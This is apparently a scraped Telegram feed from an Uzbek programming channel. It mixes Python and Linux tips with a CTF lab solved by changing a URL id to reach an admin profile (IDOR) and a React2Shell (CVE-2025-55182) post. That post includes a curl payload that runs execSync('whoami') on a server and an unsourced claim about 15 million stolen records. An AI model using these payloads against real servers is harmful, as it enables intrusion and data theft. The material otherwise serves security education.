pip install rembg
Misol:
from rembg import remove
with open("input.jpg", "rb") as i:
input_data = i.read()
output_data = remove(input_data)
with open("output.png", "wb") as o:
o.write(output_data)
@uzcodingblog
Please open Telegram to view this post
VIEW IN TELEGRAM
π’ππΌπ±π―π²πΈππ²π
Gemini β Ozodbek
Gemini yangi modeli orqali generatsiya qilindi, ovoz tiniqligi va nutq yomon emas. Avvalgi modellardan ancha sifatli
This media is not supported in your browser
VIEW IN TELEGRAM
1π₯3β€1
Please open Telegram to view this post
VIEW IN TELEGRAM
β€5
Wine β Linuxda .exe dasturlarni ishga tushirish imkonini beruvchi kutubxona. U Windows tizimini toβliq oβrnatmasdan turib koβplab dastur va oβyinlarni ochishga yordam beradi
Afzalliklari:
β’ Yengil va tez ishlaydi
β’ Virtual mashina talab qilmaydi
β’ Koβplab dasturlar bilan mos
Oβrnatish:
Ishga tushirish:
@uzcodingblog
Afzalliklari:
β’ Yengil va tez ishlaydi
β’ Virtual mashina talab qilmaydi
β’ Koβplab dasturlar bilan mos
Oβrnatish:
sudo apt update
sudo apt install wine
Ishga tushirish:
wine dastur.exe
@uzcodingblog
π₯4
#metroda
@uzcodingblog
Buildroot β bu oβrnatiladigan qurilmalar (embedded systems) uchun minimal Linux tizimini yigβishga moβljallangan build tizim. Odatda monitorlar, routerlar, sanoat panellari va transport displeylarida ishlatiladi, yaβni bu oddiy kompyuter emas β maxsus qurilma ichida ishlaydigan kichik Linux tizimi
@uzcodingblog
Missiya: Tizim arxitekturasidagi mantiqiy zaiflikni ekspluatatsiya qilib, Boshqaruvchi profilidagi CTF{...} maxfiy kodini qo'lga kiritish Ro'yxatdan o'tganingizda tizim sizga avtomatik ravishda eng pas yani oxirgi darajani beradi siz esa TASHKILOT BOSHLIG'I malumotlariga kirishingiz kerak
#CyberLab
Please open Telegram to view this post
VIEW IN TELEGRAM
π’ππΌπ±π―π²πΈππ²π
https://t.me/uzcodingblog/556?comment=5752
ZAIFLIK TOPILDI
ZAIFLIK TOPILDI
Qanday ishladi?
Ro'yxatdan o'tganingizda URL manzilda ?id=101 kabi o'zingizning raqamingiz chiqdi. Siz raqamni shunchaki 1 ga o'zgartirdingiz va to'g'ridan-to'g'ri Admin profiliga kirib bordingiz.
Xato qayerda?
Sayt ma'lumot chiqarishdan oldin foydalanuvchini umuman tekshirmagan. Ya'ni, "Bu ma'lumotni so'rayotgan odam rostdan ham shu profil egasimi?" degan mantiqiy tekshiruv kodda yo'q edi. Server shunchaki ko'r-ko'rona ishonib, adminning sirini hammaga ochib berdi.
Yurtimizning muhtaram va aziz ayollari!
Sizlarni 8 mart β Xalqaro xotin-qizlar bayrami bilan tabriklayman
Mamlakatimiz taraqqiyoti, jamiyat ravnaqi va kelajak avlodni tarbiyalashda xotin-qizlarning oβrni beqiyosdir. Sizlar oβzingizning fidokorona mehnatingiz, yuksak masβuliyatingiz va mehr-oqibatingiz bilan har bir sohada munosib hissa qoβshib kelmoqdasiz.
Shu fayzli bahor ayyomida sizlarga mustahkam sogβliq, oilaviy baxt-saodat, xonadonlaringizga tinchlik-xotirjamlik, masβuliyatli faoliyatingizda ulkan yutuqlar tilayman!
@ozodbekdevv
Please open Telegram to view this post
VIEW IN TELEGRAM
β€βπ₯4β€2π1
Forwarded from UzCERT Live
#Google #Chrome #Windows #macOS #Linux #zaiflik
Please open Telegram to view this post
VIEW IN TELEGRAM
React2Shell (CVE-2025-55182)
- CVE: CVE-2025-55182
- Nom: React2Shell
- Turi: Remote Code Execution (RCE)
- TaΚΌsir qiluvchi texnologiyalar: React Server Components, Next.js App Router
- CVSS bahosi: 9.8 β 10.0 (Critical)
Yaqinda React va Next.js ekotizimida juda xavfli zaiflik aniqlangan. Bu zaiflik React Server Components (RSC) ishlatiladigan serverlarda masofadan turib buyruq bajarishga (Remote Code Execution) imkon beradi.
Muammo RSC βFlight protocolβ maΚΌlumotlarini notoΚ»gΚ»ri qayta ishlash bilan bogΚ»liq. Maxsus tayyorlangan payload orqali hujumchi server tomonda Node.js modullarini chaqirishi va OS buyruqlarini bajarishi mumkin. Shuningdek 15million aholi malumotlari aynan shu zaiflik asosida olingan
- CVE: CVE-2025-55182
- Nom: React2Shell
- Turi: Remote Code Execution (RCE)
- TaΚΌsir qiluvchi texnologiyalar: React Server Components, Next.js App Router
- CVSS bahosi: 9.8 β 10.0 (Critical)
@uzcodingblog
Foydalanish:
Ushbu zaiflikdan faqat React oΚ»rnatilgan serverlarda foydalanishimiz mumkin shu sabab serverda React mavjudligini tekshiramiz bu uchun esa Wappoalyzer dan foydalanamiz :
Foydalanilgan texnologiyalar orasida React mavjud boΚ»lsa bu serverda React2Shell zaifligi boΚ»lishi mumkin. Zaiflikdan foydalanib Server da amal bajarish uchun:
Bu orqali server terminalida whois buyrugΚ»ini berdik va javob ubuntu tarzida chiqadi
Ushbu zaiflikdan faqat React oΚ»rnatilgan serverlarda foydalanishimiz mumkin shu sabab serverda React mavjudligini tekshiramiz bu uchun esa Wappoalyzer dan foydalanamiz :
npm install -g wappalyzer
wappalyzer https://example.com
Foydalanilgan texnologiyalar orasida React mavjud boΚ»lsa bu serverda React2Shell zaifligi boΚ»lishi mumkin. Zaiflikdan foydalanib Server da amal bajarish uchun:
curl -s -X POST http://example.com:4000/api/rsc/render \
-H "Content-Type: application/json" \
-d '{"flight":"0:require(\"child_process\").execSync(\"whoami\").toString()"}'
Bu orqali server terminalida whois buyrugΚ»ini berdik va javob ubuntu tarzida chiqadi
@uzcodingblog
This media is not supported in your browser
VIEW IN TELEGRAM
β€4
π’ππΌπ±π―π²πΈππ²π
Video message
ESP8266 (ESP-12F)